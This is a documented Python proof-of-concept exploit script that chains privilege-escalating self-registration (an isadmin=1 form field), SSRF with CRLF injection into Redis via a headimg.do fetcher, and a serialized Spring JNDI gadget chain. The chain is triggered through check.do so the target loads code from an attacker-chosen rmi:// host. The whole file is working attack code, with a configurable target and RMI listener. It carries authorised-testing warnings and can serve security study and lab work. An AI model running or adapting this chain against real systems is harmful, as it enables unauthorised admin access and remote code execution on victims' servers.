import argparse

import requests
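def register(url, username='admin', password='admin123', isadmin='1', timeout=10):
    """Self-register an account on the target through ``/doregister.do``.

    Besides the credentials the form carries an ``isadmin`` field; the PoC
    sends ``'1'``, presumably so the new account is created with admin rights
    (the server-side handling is not visible here -- confirm on the target).

    Args:
        url: Base URL of the target, e.g. ``http://host`` (a trailing slash is tolerated).
        username: Account name to create (default: the one login() expects).
        password: Account password; ``repassword`` is sent with the same value.
        isadmin: Value of the ``isadmin`` form field.
        timeout: Socket timeout in seconds so a dead host does not hang the script.

    Returns:
        The ``requests.Response`` of the register request, for inspection by the caller.
    """
    reg_url = url.rstrip('/') + '/doregister.do'
    post_data = {
        'username': username,
        'password': password,
        'repassword': password,
        'isadmin': isadmin,
    }
    resp = requests.post(url=reg_url, data=post_data, timeout=timeout)
    # Not fatal: the account may already exist from an earlier run, and
    # login() raises a clear error if the credentials really do not work.
    if resp.status_code >= 400:
        print('[!] register returned HTTP {}'.format(resp.status_code))
    return resp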
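def session_cookie_value(set_cookie):
    """Return the value of the first cookie in a raw ``Set-Cookie`` header.

    ``'JSESSIONID=abc; Path=/; HttpOnly'`` -> ``'abc'``.  Only the first ``=``
    is treated as the separator, so a value that itself contains ``=`` (e.g.
    base64 padding) is returned whole.

    Raises:
        ValueError: if the header carries no ``name=value`` pair.
    """
    first_cookie = set_cookie.split(';')[0]
    _name, sep, value = first_cookie.partition('=')
    if not sep:
        raise ValueError('malformed Set-Cookie header: {!r}'.format(set_cookie))
    return value


def login(url, username='admin', password='admin123', timeout=10):
    """Log in through ``/login.do`` and return the session cookie value.

    Redirects are deliberately not followed: the login response itself is
    what carries the ``Set-Cookie`` header, and a redirect target may not.

    Args:
        url: Base URL of the target.
        username: Account name (default: the one register() creates).
        password: Account password.
        timeout: Socket timeout in seconds.

    Returns:
        The value of the first cookie set by the login response.  exploit()
        sends it back under the name ``JSESSIONID``; that name is assumed,
        not verified here.

    Raises:
        RuntimeError: if the response sets no cookie at all (bad credentials,
            wrong base URL or an unexpected response), instead of the
            original KeyError on the missing header.
    """
    session = requests.Session()
    login_url = url.rstrip('/') + '/login.do'
    post_data = {'username': username, 'password': password}
    response = session.post(
        url=login_url, data=post_data, allow_redirects=False, timeout=timeout
    )
    set_cookie = response.headers.get('Set-Cookie')
    if not set_cookie:
        raise RuntimeError(
            'login to {} returned HTTP {} without a Set-Cookie header'.format(
                login_url, response.status_code
            )
        )
    return session_cookie_value(set_cookie)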
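def redis_ssrf_param(command, redis_host='127.0.0.1', redis_port=6379):
    """Build the ``url`` query parameter that smuggles one Redis command.

    The value is an image-looking URL whose host is followed by CRLF pairs
    wrapping ``command``.  The PoC relies on the target's ``headimg.do``
    fetcher passing that through to a raw connection to ``redis_host`` so
    Redis reads the injected line as a command (inferred from the payload
    shape, not visible in this file).  The trailing ``:port/1.jpg`` keeps
    the value looking like an image URL.
    """
    return {
        'url': 'http://{}\r\n\r\n{}\r\n\r\n:{}/1.jpg'.format(redis_host, command, redis_port),
    }


def exploit(url, cookie_value, rmi_host='rmiserver', timeout=10):
    """Write the payload into Redis key ``post27`` via ``/user/headimg.do`` and trigger it via ``/manage/check.do?pid=27``.

    The five commands build, piece by piece, a serialized-looking object
    graph naming Spring's ``DefaultBeanFactoryPointcutAdvisor``,
    ``SimpleJndiBeanFactory`` and ``JndiTemplate`` around an
    ``rmi://<rmi_host>/`` location.  The ``://`` and ``/`` separators are
    appended through ``eval`` + ``string.char`` rather than literally,
    presumably because they would otherwise be consumed by the fetcher's URL
    parsing (inferred).  The final ``check.do?pid=27`` request is where the
    target is expected to read ``post27`` back; whatever happens after that
    depends on the target and on the RMI service reachable at ``rmi_host``,
    neither of which this script controls or checks.

    Only run this against systems you are explicitly authorised to test.

    Args:
        url: Base URL of the target.
        cookie_value: Session cookie value from login(), sent as ``JSESSIONID``.
        rmi_host: Host name the target should resolve for the RMI lookup
            (command 3).  Defaults to the original PoC's ``rmiserver``; you
            will normally point it at your own listener.
        timeout: Socket timeout in seconds for each request.

    Returns:
        The ``requests.Response`` of the final trigger request.
    """
    headers = {'Cookie': 'JSESSIONID={cookie_value}'.format(cookie_value=cookie_value)}
    # Redis commands in the order they must be applied; each one is sent as a
    # separate headimg.do request.  Key name "post27" and pid=27 below belong
    # together -- change them in step if you target another id.
    commands = [
        'set post27 "\\x01\\x00java.util.HashMa\\xf0\\x01\\x02\\x01\\x01\\xc2\\x01org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor\\x01\\x01rmi"',
        "eval \"return redis.call('append','post27',string.char(0x3a,0x2f,0x2f))\" 0",
        'append post27 ' + rmi_host,
        "eval \"return redis.call('append','post27',string.char(0x2f))\" 0",
        'append post27 "Objec\\xf4\\x01\\x02org.springframework.jndi.support.SimpleJndiBeanFactor\\xf9\\x01\\x01\\x03org.springframework.jndi.JndiTemplat\\xe5\\x01\\x00\\x01\\x04org.apache.commons.logging.impl.NoOpLo\\xe7\\x01\\x01\\x04\\x01\\x01\\x01\\x00\\x01\\x00\\x01\\x05java.util.HashSe\\xf4\\x01\\x01\\x03\\x04\\x01\\x00\\x01\\x00\\x00\\x01\\x06org.springframework.aop.TruePointcu\\xf4\\x01\\x01\\x01\\x03\\x01\\x01\\x01\\x00\\x00\\x00\\x01\\x06\\x0c\\x01\\x01\\n"',
    ]
    base = url.rstrip('/')
    headimg_url = base + '/user/headimg.do'
    for index, command in enumerate(commands, 1):
        resp = requests.get(
            url=headimg_url, headers=headers, params=redis_ssrf_param(command), timeout=timeout
        )
        print('[*] step {}: HTTP {}'.format(index, resp.status_code))
    trigger = requests.get(url=base + '/manage/check.do?pid=27', headers=headers, timeout=timeout)
    print('[*] trigger: HTTP {}'.format(trigger.status_code))
    return trigger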
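if __name__ == '__main__':
    # Target comes from the command line so the script is not tied to one lab
    # host; the original hard-coded address stays as the default.
    parser = argparse.ArgumentParser(
        description='Register, log in and run the headimg.do -> Redis -> check.do chain against one target. '
        'Use only against systems you are authorised to test.'
    )
    parser.add_argument(
        'url',
        nargs='?',
        default='http://192.168.201.25',
        help='base URL of the target (default: %(default)s)',
    )
    args = parser.parse_args()
    target = args.url.rstrip('/')
    register(target)
    cookie = login(target)
    exploit(target, cookie)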